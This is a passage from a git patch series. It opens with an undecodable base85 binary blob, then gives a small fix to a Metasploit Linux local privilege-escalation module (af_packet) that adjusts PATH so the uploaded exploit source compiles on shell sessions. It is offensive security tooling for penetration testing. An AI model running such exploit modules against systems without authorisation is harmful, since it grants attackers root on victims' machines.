zKR=`aE8}M|4$1Hn+%k5Q2*7g`6A^|*z0!mBM+V)GY@qENt(jv_{K@!T5&57QG9MY9
z|Dfi7h&^{H<Exn;F|Lm8z$sSLw{wWU(6JsZpqlpP7N}Vj)c&k!124zT@jaCBW!pn4
z)X8MV4W4C=F?kyBo)OCgWq%<Hw7yhxI#?i&@!5QT;d;hhz^S5<ExU>N&2NEOow%Lx
zH~VP?<}2v#x&-5&TsL;RCiG?lCtB&6Ha}%mh#92Mv7*TwjL$Ove#Y1A&_Drq!BN5y
zq)%`roy+|1Gk@v!aQ}n&DHC4nt2u|Vz;RTl4O|ylp>LUgC69vZn141Ww8%N-C+2U@
zo@im(w{Z04F4r1N*EM6@!sE`&;k_7N&HSuSBr|?DPbP=7Ix&WETe1c)8LGpV2?F(H
z<UOPXERe@Hfz8yL!~BtV+4`YN5*qo=-Nkw$C%Kgx_lYJubxq8uzK#Wsa!Te*E9h1a
z#Y*JpxQFph+q52xQguAb_<Ww$P5m{%sln^itO);`yXXB(xZSE1a14p#z$u3(a}GCy
z@gDRgDT)l<57}@##0(u~1HNJW$?Y2NPX+b=FHG3R(et_4$xx7h=#8A5S^=jDrA1U|
zK|AfClMxw^DngzM@@#3Ue;YyIqZYJXPE`@1TRbNrK#3wU+S{^$^#e5j?Ya;H*+2<L
ztvS7p0#5qJaqx~{etNKlDzs@K&;Pu-7BiS|#Wu~!!(0?I-jx%CnJ2DcJaS)fE#od;
z&imQ$O^i=s1^C6SrYypWglf9<UVUw@h&Hppe;?KO)2!%0#@}Z}W&;AOXC>>A%>Oj_
zNq^+rvB$@X&MefNaU6ATGEVQWqr;rPj{$G2YyJnE64b5}R>f}y>1yPG1Q<471FDGl
z_>%M^wtRFaln(Q^IA_`LQz+@UUl-zc#>d{Rfj*2kK_5|H{>Coo!uY++e;o&-igwUC
zFu%8%V)Th0Szrhg*6;ux$@nzJf4@uv=J>vf@mkIkxKu|TPRK)%p16tmpW!Y`QQYW%
zKNHSz4%Y-B?gdVL7WsRF?aaTE7bfEjZMcSUgJ;W`8WyiHp1{E~mhsm~Kdt}wPSwak
zOd52|Y^x3L-li_aH5?Ofv!atcuivc6;xs9Oo`%1e5aL;kZ^F0q)r?$-&smQH!K&ha
z4lDYZ2}wvubnMfGh(i!jAD?F5FK4_xa550_U9srP{I+eH5%o~VWX9KVtiYTee@mEf
z4JQiDkiyA$<R-F|@iQD%<`T^VJOO<lxeQ;!{DYTpO}MCN3;Wcv+c|90xi2@cz_RBw
zr`cy)fK!Vje{b+8^N(Z?UC9PsX8deK@E#x>!|z8Q*C>?*4zob_ej3=p_%ftkGF)TT
zfS>V`#E<oVQ}&!WYW~N1mN5Tt=Kq@U_u0ih9?s${5m2M!JUj3@LHx=BH}}*Uy0W4_
z86V6FIAla~1QqGIhDVb**>vE{81ZeJPxK@Kv}`*sG^TO14`BQYo>V5V;VT$FyGR4W
z7#|OuX2nrQtqL(SU>`(Z0)D3z`CGkNiXSfv8o~nRI$!}Ch@1<u8BcR*iw<sbiBg2$
z>m6xm*aMupEOHHa9qaj$JV)`rQR@>oG2sp#9%i3yVLXl}6=oM(89%`MrYC57O&+D!
zkkX-k8H;i+<4<fOREYNYQ{(SHOi1D`FkO9u@nxKt6f=arU_5e``=0S)u8=v4TF?bl
zp~s&jv$)Nt3vo#s*e4f7ZVb9YfbdOL&B-ZS3}E~+R%DKXacrR1HqCFY^)BO4lkkkj
z`*Uo~WB$vY<R+Plt^y$eb&X6QUpLc<rPIe&t%*N#S<wgVA&yCL4dZD%ixx8fO^lD{
z7R8z_-3S7;IPzxG11!L=XBMXU!<?!k=Z@{nADQ!CW_&s;fVet*hnR4NGZeZ|9VZxX
zyIfz7(}g&UsHeV6<Ke<{kvIc>wJ1GiRh;JV`;PTAyzM5$uNwD>6X+v4=(l2Yw8rd5
z23GXc*Ji@GlxM}rl-!T`vpEr&vtkPKN8W@=XZ|nL@P+>eYCB>&6LxRYfI02{ms@<C
zQzmz{n9ux$+|*xK&((}4ST$g#_Ujo>;{}VG$khL{nNVXT1Pc;fh)UqJlG%B}su0tq
z_c8ybwVH7h^FPXX|3@@%9pgJ0ujMtSIXYejj{Nuc_4#Wo&@NeP;K@<cBAO{kBNwYj
znEz-*41LJ>m(OZF?YWD;08Y1j5<a%-_%~bDl@rK7UNny97MwK=aErGx{u|>RwrL=S
z@ivGlYS;@l4bU$y>FC1v#eAUci$oA;`5fu$;VdwJo01o^bRp>Vdt_i1_th6X8YVFQ
zTVKs+dTtuyp8GV8OLb)Vm@wuN4Vam3DRAZLh!u_~&n@?)49XQK+#YX!K29BuNpok;
zab#v>&2>0%HMzl+&F+|jCxY=Pt!-+?3^3$5%bf*9c;2+!;VJPsa*Odyp&Md(E=NJJ
zD<`|yfya)^-HvSUDuHM4%8K!5aNeL1BZdtVL~s=4t)i<DBEK9D4Lb6?B_*qcE9YuF
zKMZ{M2(v!68Ix6Yv~~09qLo~-;!|eS^U09Q_m<{59D{}rzhbl~b{1sku153l_#{12
ziL;g2#a^d-(9mI{M}fJxC@0sU9-YLKpGBphtE!}cga=<sU5;W`E*=AP5d}}(I?Fvc
zAt4l`6A!*R%6(2k@$6k$c7fB42b*!lj~NpiJrt|i=_zNN@w2NqgG_mG5uQ*~C_I6(
z1dpJipr^S}6nb1rx+vd4k4}1AfSs#Aa69SAZgt`_pC_j)^>jE+=m}i9Ru2W^q$0b>
zQ&vPO&Bsk~nuF#M7d4|K+r2_$mzC)gcM&|t4fmE34Siec6olvHp-qs&xwE9qv)UKB
zq{m^27sPzTgqzxvpI_{C7t#qmM2ymvU#veJcy=-m&rKtk%7Nr~=^^SomzQ*}%rC=3
z*B<JzGFO=+ySzZ;mv|grav5-SkzXcO<rNhaq5VR0JLm~#dJ@}%Xk3|({!xAIMwB@5
z-$Qr=^f*ezN_S~UySr3B;R&g7kBe%iPF9H$X9@n{+Ed}G$X@Nx*F;4`Xtvx!s<+z*
zsIa`$%fh)O)PKZRra}*0tlABvGz67u3=yb%z~L~%DOXA7=9VD_snejV%u`5@#5>?{
z_O6Mbot|7@c4@AYjKep0!dRc+8D*Rxj7wJ*;ZbUJPEQ#-JjE&+;iIBl^<QQXA}IRR
zNshOu7#>#VsIhwd8^S1y^60a~T_7B`RjOXuIW8IyK9P@SO+Dmoa8lu1RfZIit6))<
zG6dsoWXdRk9$+R9J=QDSg{UzNCAcBiQ=Y9Ny_lZdE<r@n`vyR97g73P1n)XPz^05E
za)rqCmea`y;q+mo;A|v?u`Ab+Uy+CA6w?TDzz(D3&Xt0m)zuCkHf+Rbfe|!l*szg9
zU?jgRw;1EQD1SBik&G6U<`jA8BG*;6nl9-)zZ@;26EveZhg)0h%TdH47v4VrT1j@^
z$|4o|CFM>%m`i8~QNNbtAjm4HVekcBp@2lGqIJ-)A)`is>ZUFNwE~H)BnKyDE_cx?
zhr2Ahf~@5h78U1(W7!^0xx<%-C@6PPu!XTJ603`ZF<|qHvkNE?8X=*zdCvT7Z?THK
zixp5BA$l<k%d@GWKKKK}5btUz$#K$%fIstiu;aAE1#N6i$2&cjuh?98e*}W0LS10&
z7rAIEQNBYTsA~%RFtXd}r0il+)x+676F}<FgINJ^G`$5toqO3zewo)pt<E<|NJb7M
zG(f1m9?x{bL%7TwuVp-P&2a}WAj~o9sP}wiqcpqJ<t}zQsh7)&%A7+{B3SSoJf%58
zbC8fzMh_jXGCW!bR$Pt<MFLnVFeB@Jr)RoX>bh$`IQ5WI?olr`&@&aC`ke3wr8wm&
zG7eRa$%|&BPtTY{oq;Go1}#StL&!G-)Z7P1rG_w`shKk;re`{4PMMNro9mdHJ~7iq
z%YraAQ?j_oM{}q-UvT0BFDEpSpPl12r=N>6o>0R@lx5S~OdK?AVNrll?#V55;C&kf
z1<rC}HlNK$AC)^oZ`44W+$G*oobY^POidgPuN%+YlVMEus0mFbAaZhXAY}-bE63p}
zD#5}<KQ>Rk!|3tg!TMsFBGjM+rdmofJ<-jX9`D0IL)D~*2%x4?e)N?q9b}B>5{H9k
zaiU|wF3Da6It7}yl+u?u|0^LdG%%}KXn=rRSdj}YIuvlp&A=I6<DsTBR0gXq9}g83
z)8rF#9Rkj<#P&CLqFHzu3Yb(q8#bQ@4~ROjNLVjb@P3nse(|ZXQ??q+D@)Xzg)?fe
zYOTXDclsoUUb^WQEzm-dUBL@Yb75!Z12a#OB}`<zioujZFPL%gOJ_)p>KPxZo?GUi
zp27=PkV5e;8Jz0A(=*AC@I0scrMURwIzS^{-BV#1aTODap)b$va^Q_BdFUCPoyj}`
z)KlnFlQUi<k<H65q9A#d>Tp!=;&9N?h-ysJiJDy5?cN66ug5wiIbJtGqS2h=4C@4+
z=@Br8r5s#Q2XHK@CHlqX8;G>HKw-vGIWA~k2gIH4D0Sks85~@ce}tOw)%$oH^kyEU
z6Pm|;lv5}sw0p|QEkM)=qP2x~fO^pjbkmAOrB3b!l`ZL<mP8OUn;XU$)+3==4WkI_
zVel8{V*Q1sgM-!yxTf{L+u<sOD^TNUwmCCwnU0C+SvKUF0;gUg;N=__6Sk_VTA1LB
zl0Q0#)(}~CTV^I8Jplgh3>udXccHV`S1i=L!a+?LNG%e>V=ip&<hfO?@S)!Ap;?Ak
z6vd+9LSNBoTBH!8tpvY0O5v2W5V8(mSlS}XYAwq185qqaAWjj41=?*Ydt=C`&{ZK4
zTIYaI?F$^VD^M9GEJ>r6%U3z*eMqW*RsP2QM<;NdSKahp8!v_lg+%tsvclDFhssE*
zlc}v#4ea}%VI^;`;72Sa)fR_$Hj#^7)GBPVMzKY8rv;zznXy);8eKvw=OQ?2^k@g~
z0n~1YP+9=H-DMn-Du&hDrD#?NO+V(uKp<R>m(!?xh3&2yP<UyNa#$!TeHD0B4Ax=P
zJ$i+HvGNz+?&ByWJ$m60$}5N*S}1{#<ED{@clb~n^Z?SyK!q^`v7a*sSc6$}MTt+l
zf!rPDY(4sUA4V;pB@jxzjdjrbqx3=rSYEMvsNSgJ0&P%hUpnQ9Pi;oB&DEJu6ODEP
zRm-PFL9vQ@IDgWd;f~3+tc*Ff$&UHyne%Kyr+w(-r7_Ob)_^txkfQycS`=Yw(F<!7
z^ll`y$lR=A!{^FFg?T3wMsbw-Fw;^uIn1{Xp#|n@R1~=#D)TgqVcI=YebfS-twBe~
znx4O~=-@PbacFZGQm?3m6_%1d^|C2Fqhaue;^JahsO2v&I)%fTm+i^MPR3Q1gVhhh
z26ds%qk3Ybs2BI>jX!mPxrRXSh88C}GSpfSEIzbXZ`N@EUxwYbP<pZ1)pHMY(R!ua
zL3vX9T~AT)gxaBmO)9i1Mo6z#!-MZ;Xeoq&YCX*kXl_34e_&Gt8jm@>?G`Ka%!>x8
zC8ydDga<Aq4IW%!1Dp1t6i74|G?FGb=erAW*8~>z-oi(l3l)8Z<vJ6C#3>B-GvFO}
zm>)0$V{OPQZE8_y#h|yNf9pTqU4?E*kc>xd2yjMqoJO_6yn_{m+7Qt;QQavazpL9S
zys=Y@PrXW0!yfT22H_QPv`ZaC9i5#c7af1!(p8Q=F~QPPuEu9y`3gQ$<ZmZ>&`U(R
zob29nEN=7B&B&(ucHhNcpYRRDR`R_QJ-Td);8L&80G7~1-f^-|m-Gm-m4&TM<nfbz
zdeN7U;Wo@$^=8>?hwSop_nvewGn~!*g3K(NQ&oD+XD<F?H1ui<^A#80bdp=&?%s>O
z^Co2`oB5^-vmD+;o<7;Vb0M>tH)_onMJ$wU-nqOpeX&MLOse_1h(bkO89_C_Z(BuF
z{3m&@yfeXKlfU8fRyq3J36?wM>UXV{7*##G?MgS9P0h<sSaF4yK%P*A*wu>Ix@^N0
zRbYrlL!b5&vhArpvG~eD#B4s-u0<^Wg6(N?QLJh=;DO6oTiRePNnfXZk3aMFw)uS+
VeS<)H;<gziD}=M1Jbj}3{{hfAt@{7~


From dc227153c44f1116402ec579c6be1e0e87e8aa5b Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Thu, 17 May 2018 18:43:27 +0800
Subject: [PATCH 6/6] fix gcc on shell_reverse_tcp session

---
 .../linux/local/af_packet_packet_set_ring_priv_esc.rb       | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
index 06b114a018..2b9e46225e 100644
--- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -89,8 +89,12 @@ class MetasploitModule < Msf::Exploit::Local
 
   def upload_and_compile(path, data)
     upload "#{path}.c", data
-    output = cmd_exec "gcc -o #{path} #{path}.c"
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
 
+    output = cmd_exec gcc_cmd
     unless output.blank?
       print_error output
       fail_with Failure::Unknown, "#{path}.c failed to compile"